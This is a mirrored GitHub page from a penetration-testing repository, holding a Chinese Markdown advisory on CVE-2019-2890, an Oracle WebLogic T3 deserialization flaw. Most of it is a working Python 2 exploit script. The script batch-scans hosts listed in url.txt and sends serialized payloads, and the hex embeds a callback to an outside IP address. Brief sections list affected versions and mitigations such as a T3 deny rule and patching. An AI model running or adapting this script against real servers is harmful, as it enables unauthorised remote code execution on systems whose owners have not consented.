admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-07-30 14:34:31 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/CVE-2019-2890-Oracle WebLogic 反序列化严重漏洞.md

170 lines
10 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## CVE-2019-2890-Oracle WebLogic 反序列化严重漏洞
### 漏洞背景
HSCERT监测发现WebLogic官方发布了CVE-2019-2890漏洞预警。此漏洞存在于Weblogic Console组件中未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限。
WebLogic 是 Oracle 公司出品的基于 JavaEE 架构的中间件,用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用。
### 漏洞描述
Weblogic在利用T3协议进行远程资源加载调用时默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击。
由于T3协议在Weblogic控制台开启的情况下默认开启而Weblogic默认安装会自动开启控制台所以攻击者可通过此漏洞造成远程代码执行以控制Weblogic服务器。
漏洞PoC如下
```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
# 2019-10-17 8:45
import socket
import time
import re
import sys
timeout = int(sys.argv[1])
VUL=['CVE-2019-2890']
PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
VER_SIG=['\\$Proxy[0-9]+']
vul_no = []
vul_yes = []
vul_more_test = []
def t3handshake(sock,server_addr):
print '正在连接服务器...'
sock.connect(server_addr)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
sock.recv(1024)
def buildT3RequestObject(sock,port,server_addr):
print '%s:%d连接成功,正在发送请求...' %(server_addr[0],server_addr[1])
data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
data3 = '1a7727000d3234322e323134'
data4 = '2e312e32353461863d1d0000000078'
for d in [data1,data2,data3,data4]:
sock.send(d.decode('hex'))
time.sleep(2)
lendate = len(sock.recv(2048))
print '发送有效载荷请求成功,接收长度:%d'%(lendate)
return lendate
def sendEvilObjData(sock,data,lendate):
print '正在执行载荷,请稍等...'
payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
payload+=data
payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
sock.send(payload.decode('hex'))
time.sleep(2)
sock.send(payload.decode('hex'))
res = ''
start = time.time()
try:
while True:
res += sock.recv(4096)
time.sleep(0.1)
end =time.time()
timeend = end-start
if lendate == 0 and timeend > timeout:
break
except Exception as e:
pass
return res
def checkVul(res,server_addr,index):
print '执行结果:'
p=re.findall(VER_SIG[index], res, re.S)
if len(p)>0:
print '%s:%d 存在 %s 漏洞。'%(server_addr[0],server_addr[1],VUL[index])
vul_yes.append(server_addr)
else:
print '%s:%d 不存在 %s 漏洞。' % (server_addr[0],server_addr[1],VUL[index])
print '[+] You look like Cai Xukun when you play basketball'
vul_no.append(server_addr)
def run(index):
with open("url.txt",'r') as lists:
for server_addr in lists:
server_addr=server_addr.strip('\n\r')
dip=server_addr.split(':')[0]
global dport
dport=int(server_addr.split(':')[1])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(15)
server_addr = (dip, dport)
try:
t3handshake(sock,server_addr)
except Exception as e:
print '%s:%d连接失败请检查IP是否存活...' %(server_addr[0],server_addr[1])
else:
try:
lendate = buildT3RequestObject(sock,dport,server_addr)
rs=sendEvilObjData(sock,PAYLOAD[index],lendate)
# print 'rs',rs
except Exception as e:
print '%s:%d请求频繁,请稍后自行单独测试...' %(server_addr[0],server_addr[1])
vul_more_test.append(server_addr)
else:
checkVul(rs,server_addr,index)
finally:
sock.close()
print '='*50
print '检测完成!'
print '以下IP存在CVE-2019-2890漏洞'
for yes in vul_yes:
print '%s:%s' % (yes[0],yes[1])
print '='*50
print '以下IP不存在漏洞'
for no in vul_no:
print '%s:%s' % (no[0],no[1])
print '='*50
print '以下IP请求频繁需单独自行测试'
for more in vul_more_test:
print '%s:%s' % (more[0],more[1])
print '='*50
if __name__=="__main__":
run(0)
```
### 漏洞危害
**严重**
### 影响版本
WebLogic Server 10.3.6.0
WebLogic Server 12.1.3.0
WebLogic Server 12.2.1.3
### 安全建议
一、禁用 T3 协议
如果您不依赖 T3 协议进行 JVM 通信,可通过暂时阻断 T3 协议缓解此漏洞带来的影响。
1. 进入 Weblogic 控制台,在 base_domain 配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器。
2. 在连接筛选器中输入weblogic.security.net.ConnectionFilterImpl在连接筛选器规则框中输入* * 7001 deny t3 t3s。
3. 保存生效(无需重启)。
二、排查弱口令
排查 Weblogic 管理后台是否存在弱口令,增强密码强度。
三、升级补丁
相关链接
https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
Reference in New Issue View Git Blame Copy Permalink